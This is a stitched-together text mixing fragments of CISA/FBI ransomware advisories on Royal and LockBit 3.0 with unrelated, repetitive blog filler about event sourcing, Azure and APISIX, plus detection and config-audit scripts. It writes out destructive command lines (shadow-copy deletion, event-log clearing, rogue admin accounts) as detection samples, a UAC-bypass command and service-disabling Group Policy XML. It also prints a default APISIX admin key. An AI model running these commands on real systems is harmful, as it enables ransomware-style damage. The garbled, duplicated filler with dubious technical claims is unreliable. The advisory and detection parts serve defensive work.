FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Encryption
Before starting the encryption process, Royal actors:
Use Windows Restart Manager to determine whether targeted files are currently in use or blocked by other applications [T1486].[1]
Use Windows Volume Shadow Copy service (vssadmin.exe) to delete shadow copies to prevent system recovery.[1]
FBI has found numerous batch (.bat) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].
Malicious files have been found in victim networks in the following directories:
C:\Temp\
C:\Users\<user>\AppData\Roaming\
C:\Users\<user>\
C:\ProgramData\
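The pre-encryption steps and batch-file actions described above (shadow copy deletion, a new admin user, a forced Group Policy refresh, event-log clearing, and scripts run from the staging directories) leave command lines that endpoint telemetry records. The following Python is an added example, not part of the advisory or any FBI/CISA tooling: it runs that detection logic over constructed process-creation records with simplified Sysmon/4688-style fields. Technique IDs are the advisory's where it gives one; the T1490 mapping for `vssadmin` is this example's own, as the advisory cites a reference there instead.

```python
"""
Detection logic for the pre-encryption and batch-file behaviours the
advisory describes, run over constructed process-creation records
(Sysmon Event ID 1 / Windows 4688 style fields, simplified).
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    image: str     # full path of the new process
    cmdline: str   # its command line


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    technique: str
    cmdline: str


# Technique IDs are the advisory's where it gives one (event-log clearing,
# new admin user, GPO modification). T1490 for vssadmin is this example's
# own mapping; the advisory cites a reference there instead.
CMDLINE_RULES = [
    ("shadow_copy_deletion", "T1490",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("event_log_cleared", "T1070.001",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\s+(application|system|security)\b", re.I)),
    ("local_account_created", "T1078.002",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("added_to_administrators", "T1078.002",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("forced_gpo_refresh", "T1484.001",
     re.compile(r"\bgpupdate(\.exe)?\b.*/force\b", re.I)),
]

# Staging directories named in the advisory. The profile root is matched
# only for files dropped directly in it, since every user process lives
# somewhere under C:\Users otherwise.
STAGING_DIRS = re.compile(
    r"^(C:\\Temp\\|C:\\ProgramData\\|C:\\Users\\[^\\]+\\AppData\\Roaming\\|C:\\Users\\[^\\]+\\[^\\]+$)",
    re.I)
BATCH_PATH = re.compile(r'[A-Za-z]:\\[^\s"]+\.bat\b', re.I)


def analyze(events):
    """Apply every rule to every event; one Finding per rule hit."""
    findings = []
    for ev in events:
        for rule, technique, rx in CMDLINE_RULES:
            if rx.search(ev.cmdline):
                findings.append(Finding(ev.host, rule, technique, ev.cmdline))
        for path in BATCH_PATH.findall(ev.cmdline):
            if STAGING_DIRS.match(path):
                findings.append(Finding(ev.host, "batch_from_staging_dir", "n/a", ev.cmdline))
    return findings


def triage(findings):
    """Per-host verdict: two or more distinct rules on one host is the
    chained pattern the batch files produce; a single hit is a lead."""
    rules_by_host = defaultdict(set)
    for f in findings:
        rules_by_host[f.host].add(f.rule)
    return {h: ("probable_ransomware_staging" if len(r) >= 2 else "suspicious")
            for h, r in rules_by_host.items()}


SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcEvent("ws01", r"CORP\jdoe", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("ws01", r"CORP\jdoe", r"C:\Windows\System32\net.exe", "net user helpdesk2 Placeholder1 /add"),
    ProcEvent("ws01", r"CORP\jdoe", r"C:\Windows\System32\net.exe", "net localgroup administrators helpdesk2 /add"),
    ProcEvent("ws01", r"CORP\jdoe", r"C:\Windows\System32\gpupdate.exe", "gpupdate /force"),
    ProcEvent("ws01", r"CORP\jdoe", r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
    ProcEvent("ws02", r"CORP\svc_ops", r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\ProgramData\update.bat"'),
    ProcEvent("ws02", r"CORP\svc_ops", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Users\svc_ops\AppData\Roaming\7z\run.bat"),
    ProcEvent("ws03", r"CORP\asmith", r"C:\Windows\System32\gpupdate.exe", "gpupdate /target:computer"),
    ProcEvent("ws03", "SYSTEM", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.rule:25} [{f.technique}] {f.cmdline}")
    print(triage(analyze(SAMPLE_EVENTS)))
```

Any one of these command lines also occurs in legitimate administration, which is why `triage` only escalates a host when several distinct rules fire in its events; in production the same grouping would be bounded by a time window and enriched with the user and parent process.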
Indicators of Compromise (IOC)
See Tables 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.
Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023
(Table contents are not reproduced in this extract. One surviving table fragment reads: "The actors encrypted data to determine which files were being used or blocked by other applications.")
MITIGATIONS
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.
Require administrator credentials to install software.
Require multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
Segment networks [CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
Disable unused ports.
Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures it will not be severely interrupted or left with only irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
Event sourcing and databases have been the go-to solutions for data storage, but what’s the next step? Let’s explore the pros and cons of each and see what the future holds.
## Understanding Event Sourcing and Its Popularity
I am an excited scientist who has made a sensational discovery about event sourcing and its potential to outgrow databases. Event sourcing is a powerful tool that is being adopted by many large organizations as their database architectural design. It has the capability to scale up and serve the needs of the modern data industry.
Event sourcing is a process of storing data in an event log, which is an append-only store. This means that all changes to the data are recorded as a sequence of events. This makes it easier to track changes over time and allows for easy replication of data. Event sourcing also allows for easy scalability, as the data can be replicated across multiple servers.
The popularity of event sourcing is growing rapidly, as it offers many advantages over traditional databases. Event sourcing allows for faster data retrieval, as it stores data in an append-only store. This makes it easier to query and analyze data over time. It also allows for better scalability, as the data can be replicated across multiple servers. Additionally, event sourcing is more secure than traditional databases, as it is append-only and does not allow for any changes to be made to the data.
So, is event sourcing going to outgrow databases? It is hard to say for sure, but the advantages offered by event sourcing make it a strong contender for replacing traditional databases. Event sourcing allows for faster data retrieval, better scalability, and improved security. As more organizations begin to adopt event sourcing, it is likely that it will become the preferred choice for many applications.
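The post describes event sourcing as an append-only log of events from which state is rebuilt, and credits the append-only property with better security. The Python below is an added example (not code from the post) showing both halves of that: an `EventStore` whose only write is `append()` and whose state comes from `replay()`, plus the caveat a practitioner would add. "Append-only" in application code does not stop someone with direct storage access from editing a stored event; chaining each event to the hash of its predecessor makes such an edit detectable, as `verify()` shows on a constructed account-balance history.

```python
"""
Append-only event store with replay and a hash chain. Constructed
example: account balances rebuilt from deposit/withdrawal events.
"""
import hashlib
import json
from dataclasses import dataclass, replace

GENESIS = "0" * 64  # prev_hash of the first event


@dataclass(frozen=True)
class Event:
    seq: int          # 1-based position in the log
    kind: str         # event type, e.g. "deposited"
    payload: dict     # event data
    prev_hash: str    # digest of the preceding event (chain link)
    digest: str       # digest over (seq, kind, payload, prev_hash)


def compute_digest(seq: int, kind: str, payload: dict, prev_hash: str) -> str:
    # Canonical JSON so the same event always hashes the same way.
    body = json.dumps([seq, kind, payload, prev_hash], sort_keys=True,
                      separators=(",", ":"))
    return hashlib.sha256(body.encode()).hexdigest()


class EventStore:
    """The only write operation is append(); state is derived by replay()."""

    def __init__(self, events=None):
        self._events = list(events or [])

    def append(self, kind: str, payload: dict) -> Event:
        prev = self._events[-1].digest if self._events else GENESIS
        seq = len(self._events) + 1
        ev = Event(seq, kind, payload, prev, compute_digest(seq, kind, payload, prev))
        self._events.append(ev)
        return ev

    def events(self):
        return list(self._events)

    def replay(self) -> dict:
        """Rebuild current balances by folding over every event in order."""
        balances = {}
        for ev in self._events:
            acct = ev.payload["account"]
            if ev.kind == "deposited":
                balances[acct] = balances.get(acct, 0) + ev.payload["amount"]
            elif ev.kind == "withdrawn":
                balances[acct] = balances.get(acct, 0) - ev.payload["amount"]
        return balances

    def verify(self):
        """Return the seq of the first event whose digest or chain link is
        inconsistent, or None if the log is intact. Editing a stored event
        breaks its own digest; re-hashing the edited event instead breaks
        the prev_hash of every later event."""
        prev = GENESIS
        for ev in self._events:
            if ev.prev_hash != prev or ev.digest != compute_digest(
                    ev.seq, ev.kind, ev.payload, ev.prev_hash):
                return ev.seq
            prev = ev.digest
        return None


def build_sample_store() -> EventStore:
    """Constructed sample history."""
    store = EventStore()
    store.append("deposited", {"account": "alice", "amount": 100})
    store.append("withdrawn", {"account": "alice", "amount": 30})
    store.append("deposited", {"account": "bob", "amount": 30})
    return store


def tampered_copy(store: EventStore, seq: int, new_payload: dict) -> EventStore:
    """Simulate someone with storage access editing event `seq` in place
    (as a database UPDATE would) without touching the digests."""
    edited = [replace(ev, payload=new_payload) if ev.seq == seq else ev
              for ev in store.events()]
    return EventStore(edited)


if __name__ == "__main__":
    s = build_sample_store()
    print("balances:", s.replay(), "intact:", s.verify() is None)
    t = tampered_copy(s, 2, {"account": "alice", "amount": 5})
    print("tampered balances:", t.replay(), "first bad seq:", t.verify())
```

The chain only detects edits if the latest digest is kept somewhere the storage administrator cannot silently rewrite (a signed checkpoint, a separate audit system); otherwise an attacker with write access can recompute every digest after the edit.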
Find out which metrics matter most to a developer in order to improve their experience.
## Developer Experience (DevEx or DX)
Developer experience. If you provide APIs or API-driven products, you probably hear this term often. After all, you need developers for an API to succeed, and if they do not have an excellent experience, they will move on to something else.
What is developer experience?
Developer experience (DevEx or DX) is an extension of user experience (UX) in which the focus is on users affected by the technical side of things, for example tools, languages, and workflows. But DevEx goes well beyond "UX for developers": it means making sure developers can easily understand and use an API for their own applications and use cases. Excellent DevEx happens when you communicate with your developer users, understanding and directly meeting their needs. If you can win over developers, you can build a large and thriving ecosystem around your products.
Code is the heart of the developer experience. It is the most important part of DevEx, because it is what lets developers build applications that use your API. Good coding tools are essential to give developers a consistent and pleasant experience. Tools must be easy to learn and use, and must offer intuitive features. Good coding tools can help developers quickly build robust and reliable applications that take advantage of your API.
Finally, a good developer experience requires complete and accurate documentation. Documentation must be clear and concise, and must give developers all the information they need to understand and use your API. It must also include clear examples and tutorials to help developers understand how your API works and quickly build applications that take advantage of it. Good documentation can make all the difference between a developer who understands your API and one who gives up.
In summary, developer experience is essential to the success of an API. To offer developers an exceptional experience, you must focus on coding, provide intuitive and easy-to-use tools, and supply complete and accurate documentation. If you can offer an exceptional developer experience, you can build a large ecosystem around your product and succeed in the long term. As an enthusiastic scientist who has just made a sensational discovery, I am convinced that developer experience is the key to an API's success.
Microsoft Azure is a cloud computing platform and infrastructure created by Microsoft for building, deploying, and managing applications and services through a global network of Microsoft-managed data centers. It provides a range of cloud services, including compute, storage, analytics, networking, and identity management. Azure is designed to help organizations of all sizes quickly and cost-effectively develop, deploy, and manage applications and services in the cloud.
Azure offers a wide range of services that can be used to build, deploy, and manage applications and services in the cloud. These include compute, storage, analytics, networking, and identity management. Compute services provide access to virtual machines, containers, and serverless computing resources. Storage services provide access to object storage, file storage, and databases. Analytics services provide access to data analysis tools such as machine learning, data warehousing, and big data processing. Networking services provide access to virtual networks, DNS, load balancing, and traffic management. Identity management services provide access to authentication and authorization services.
Azure also provides a range of tools and services that can be used to manage applications and services in the cloud. These include Azure Resource Manager (ARM), which provides a unified way to deploy, manage, and monitor resources in the cloud; Azure Automation, which provides a way to automate tasks; and Azure Monitor, which provides a way to monitor the performance of applications and services in the cloud. Additionally, Azure provides a range of security features such as encryption, identity management, and access control. These features help ensure that applications and services are secure and compliant with industry standards.
In conclusion, Microsoft Azure is a powerful cloud computing platform and infrastructure that provides a wide range of services for building, deploying, and managing applications and services in the cloud. It offers a range of compute, storage, analytics, networking, and identity management services that can be used to quickly and cost-effectively develop, deploy, and manage applications and services in the cloud. Additionally, it provides a range of tools and services for managing applications and services in the cloud as well as a range of security features for ensuring that applications and services are secure and compliant with industry standards.
Contextual advertising is a powerful tool for businesses to reach their target audience with relevant, targeted ads. Learn how it works and its potential to drive sales!
## The Full Context: A Software Project’s Aura
I am an excited scientist who has made a sensational discovery: coding is the key to unlocking The Full Context. By coding, I mean writing code that is both readable and maintainable. It’s not just about writing code that works; it’s about writing code that is easy to understand and modify.
Coding is the foundation of The Full Context. It is the language that allows us to communicate our ideas, our intentions, and our decisions to the software. It is the bridge between the project’s stakeholders and the software itself. Without coding, there would be no way to effectively communicate the project’s requirements to the software.
Coding is also the key to unlocking the potential of The Full Context. By writing code that is both readable and maintainable, we can ensure that the project’s requirements are accurately represented in the software. We can also ensure that future changes and modifications can be made quickly and easily. This allows us to keep up with the ever-changing requirements of the project, while still maintaining a high level of quality.
The Full Context is a powerful tool that can be used to create amazing software projects. But without coding, it would remain just a concept, never fully realized. By coding, we can unlock its potential and create projects that are both powerful and maintainable. This is why coding is so important; it is the key to unlocking The Full Context and creating amazing software projects.
Microsoft Azure is a cloud computing platform and infrastructure created by Microsoft for building, deploying, and managing applications and services through a global network of Microsoft-managed data centers. It provides software as a service (SaaS), platform as a service (PaaS) and infrastructure as a service (IaaS) and supports many different programming languages, tools, and frameworks, including both Microsoft-specific and third-party software and systems.
Azure provides a comprehensive set of cloud services that enable organizations to build, deploy, and manage applications across a global network of Microsoft-managed data centers. It offers a wide range of services, including virtual machines, storage, databases, networking, analytics, and more. It also provides tools for developing and managing applications, such as Visual Studio, Azure DevOps, and Azure Machine Learning.
Azure enables organizations to quickly and easily deploy applications and services to the cloud. It provides a secure, reliable, and cost-effective platform for running applications in the cloud. It also provides a range of services for managing and monitoring applications and services, including Azure Monitor, Azure Security Center, and Azure Automation. Additionally, it offers advanced analytics capabilities with Azure Machine Learning and Azure Cognitive Services.
In addition to providing cloud services, Azure also offers a range of tools for developing and managing applications. It provides a range of development tools such as Visual Studio Code, Visual Studio Team Services, and Azure DevOps. It also provides a range of services for managing applications such as Azure Resource Manager, Azure Automation, and Azure Monitor. Additionally, it provides a range of services for monitoring applications such as Azure Application Insights and Azure Security Center.
Azure also provides a range of services for storing data in the cloud. It offers a range of storage services such as Azure Blob Storage, Azure Files, Azure Queue Storage, and Azure Table Storage. It also provides a range of database services such as Azure SQL Database and Azure Cosmos DB. Additionally, it provides a range of services for managing data such as Azure Data Factory and Azure Data Lake.
Overall, Microsoft Azure is an incredibly powerful cloud computing platform that enables organizations to quickly and easily deploy applications and services to the cloud. It provides a secure, reliable, and cost-effective platform for running applications in the cloud. It also provides a range of tools for developing and managing applications as well as services for storing data in the cloud. With its comprehensive set of cloud services and tools, Microsoft Azure is an essential platform for any organization looking to take advantage of the power of the cloud.
Secure your APIs with Apache APISIX – the open source, high-performance API gateway that provides secure admin access.
Securing Your Apache APISIX Admin Access
I am an excited scientist who has made a sensational discovery: data security can be improved by protecting your Apache APISIX admin access. This is a critical component of your infrastructure, as it is responsible for routing traffic to the right places. If an attacker were to gain access to this, they could potentially redirect traffic to their own infrastructure, leading to data theft or financial losses.
To ensure the security of your data, it is essential to protect your Apache APISIX admin access. Here are a few ways to do this:
First, you should enable authentication for the admin API. This will require users to enter a username and password before they can access the API. You can also use two-factor authentication for additional security. Additionally, you should limit the IP addresses that are allowed to access the admin API. This will ensure that only trusted IP addresses can access the API and prevent unauthorized access.
Second, you should use TLS encryption for all communication with the admin API. This will ensure that all data is encrypted in transit and protect it from interception. Additionally, you should use a strong cipher suite to ensure that the data is encrypted with a strong algorithm.
Finally, you should monitor all activity on the admin API. This will allow you to detect any suspicious activity and take action quickly. You should also use logging to track all requests and responses to the admin API. This will allow you to review any suspicious activity and take action if necessary.
In conclusion, protecting your Apache APISIX admin access is essential for ensuring the security of your data. By following the steps outlined above, you can ensure that your data is safe and secure. With these measures in place, you can rest assured that your data is protected from unauthorized access and theft.
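The three measures above (authenticate the Admin API, restrict which source addresses may reach it, and serve it over TLS) map onto settings in the APISIX `config.yaml`. The Python below is an added example, not code from the APISIX project: it audits the `deployment.admin` section of a config loaded into a dict and contrasts a constructed weak configuration with a hardened one. Key names follow the APISIX 3.x layout as the author recalls it (`admin_key`, `allow_admin`, `https_admin` under `deployment.admin`); the admin key in the hardened config is a placeholder, and the default-key constant is the value shipped in the project's example config, which the checker flags.

```python
"""
Audit an APISIX config.yaml `deployment.admin` section (loaded into a
dict) for weak Admin API settings: missing or default admin_key, an
allow_admin list that admits every source address, and the Admin API
served over plain HTTP. Two constructed configs, weak and hardened,
show the difference.
"""
import ipaddress

# Admin key shipped in the example config distributed with APISIX; it
# must be replaced before the Admin API is reachable by anyone.
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"
MIN_KEY_LENGTH = 32

WEAK_CONFIG = {  # constructed: the settings a fresh install ships with
    "deployment": {
        "admin": {
            "admin_key": [{"name": "admin", "key": DEFAULT_ADMIN_KEY, "role": "admin"}],
            "allow_admin": ["0.0.0.0/0"],   # reachable from anywhere
            "https_admin": False,
        }
    }
}

HARDENED_CONFIG = {  # constructed: what the audit expects to see
    "deployment": {
        "admin": {
            # Placeholder key; generate a real one with `openssl rand -hex 32`.
            "admin_key": [{"name": "admin", "key": "0123456789abcdef" * 4, "role": "admin"}],
            "allow_admin": ["127.0.0.0/24", "10.20.0.0/16"],  # loopback and the ops network
            "https_admin": True,
        }
    }
}


def audit_admin_config(cfg: dict) -> list:
    """Return a list of human-readable findings; empty means no issue found."""
    admin = cfg.get("deployment", {}).get("admin", {})
    issues = []

    keys = admin.get("admin_key") or []
    if not keys:
        issues.append("admin_key: none configured, the Admin API accepts unauthenticated requests")
    for entry in keys:
        name, key = entry.get("name", "?"), str(entry.get("key", ""))
        if key == DEFAULT_ADMIN_KEY:
            issues.append(f"admin_key[{name}]: well-known default key")
        elif len(key) < MIN_KEY_LENGTH:
            issues.append(f"admin_key[{name}]: key shorter than {MIN_KEY_LENGTH} characters")

    allow = admin.get("allow_admin") or []
    if not allow:
        issues.append("allow_admin: empty, Admin API reachable from any source address")
    for cidr in allow:
        try:
            net = ipaddress.ip_network(cidr, strict=False)
        except ValueError:
            issues.append(f"allow_admin: unparseable entry {cidr!r}")
            continue
        if net.prefixlen == 0:
            issues.append(f"allow_admin: {cidr} admits every source address")

    if not admin.get("https_admin", False):
        issues.append("https_admin: false, admin keys travel over plaintext HTTP")
    return issues


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_admin_config(cfg) or "no issues")
```

Run it against a real file by loading `config.yaml` with a YAML parser and passing the resulting dict; the third measure in the post, monitoring, is not a config.yaml setting and is covered by shipping the gateway's access and error logs to the SIEM.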
#StopRansomware: LockBit 3.0
TECHNICAL DETAILS
CAPABILITIES
LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.
INITIAL ACCESS
Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].
EXECUTION AND INFECTION PROCESS
During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:
LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.
After files are encrypted, LockBit 3.0 drops a ransom note with the new filename <Ransomware ID>.README.txt and changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001]. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server [T1027].
Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.
EXFILTRATION
LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).
LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS
LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts is observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:
Indicators of Compromise (IOCs)
The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.
LockBit 3.0 Black Icon
LockBit 3.0 Wallpaper
LockBit Command Line Parameters
Mutual Exclusion Object (Mutex) Created
When executed, LockBit 3.0 will create the mutex Global\<MD4 hash of machine GUID> and check whether this mutex already exists, to avoid running more than one instance of the ransomware.
UAC Bypass via Elevated COM Interface
LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via an elevated Component Object Model (COM) interface. C:\Windows\System32\dllhost.exe is spawned with high integrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC7.
For example, %SYSTEM32%\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}.
Volume Shadow Copy Deletion
LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.
Registry Artifacts
LockBit 3.0 Icon
LockBit 3.0 Wallpaper
Disable Privacy Settings Experience
Enable Automatic Logon
Disable and Clear Windows Event Logs
Ransom Locations
Safe Mode Launch Commands
LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:
Group Policy Artifacts
The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:
<NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}">
  <NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_D" changed="%s" uid="%s">
    <Properties action="U" name="%%ComputerName%%_D" path="D:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/>
Services.xml stops and disables services on the Active Directory (AD) hosts.
<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQLPBENGINE" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0">
    <Properties startupType="DISABLED" serviceName="MSSQLFDLauncher" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQLSERVERAGENT" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SSASTELEMETRY" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0">
